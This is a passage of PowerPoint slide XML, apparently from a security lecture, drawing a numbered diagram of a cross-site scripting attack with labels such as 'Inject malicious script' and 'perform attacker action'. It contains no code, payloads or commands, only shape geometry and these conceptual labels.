                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2148926" y="4140789"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845129" y="4356419"/>
            <a:ext cx="3260725" cy="1130300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3260725" h="1130300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3260270" y="1129980"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777782" y="4322292"/>
            <a:ext cx="122520" cy="89301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5631877" y="1905000"/>
            <a:ext cx="2301433" cy="744601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477086" y="2752725"/>
            <a:ext cx="1905" cy="1704339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="1704339">
                <a:moveTo>
                  <a:pt x="1501" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1703884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6430691" y="4410159"/>
            <a:ext cx="92844" cy="116893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6854825" y="3291840"/>
            <a:ext cx="1052830" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Inject  malicious  script</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2865438"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73025" y="6182409"/>
            <a:ext cx="238760" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298616" y="6194983"/>
            <a:ext cx="1802764" cy="313055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="5080" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>eant us to run</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4724400"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73025" y="4731702"/>
            <a:ext cx="2123440" cy="1482725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="447040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1860"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>execute script  embedded in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>input  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>as though</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979613" y="5049837"/>
            <a:ext cx="2740025" cy="989330"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2740025" h="989329">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2739988" y="989098"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4664177" y="5983512"/>
            <a:ext cx="122530" cy="89026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2223650" y="5196045"/>
            <a:ext cx="2634821" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="5555" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>perform </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-225" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840027" y="4624502"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840027" y="4624502"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
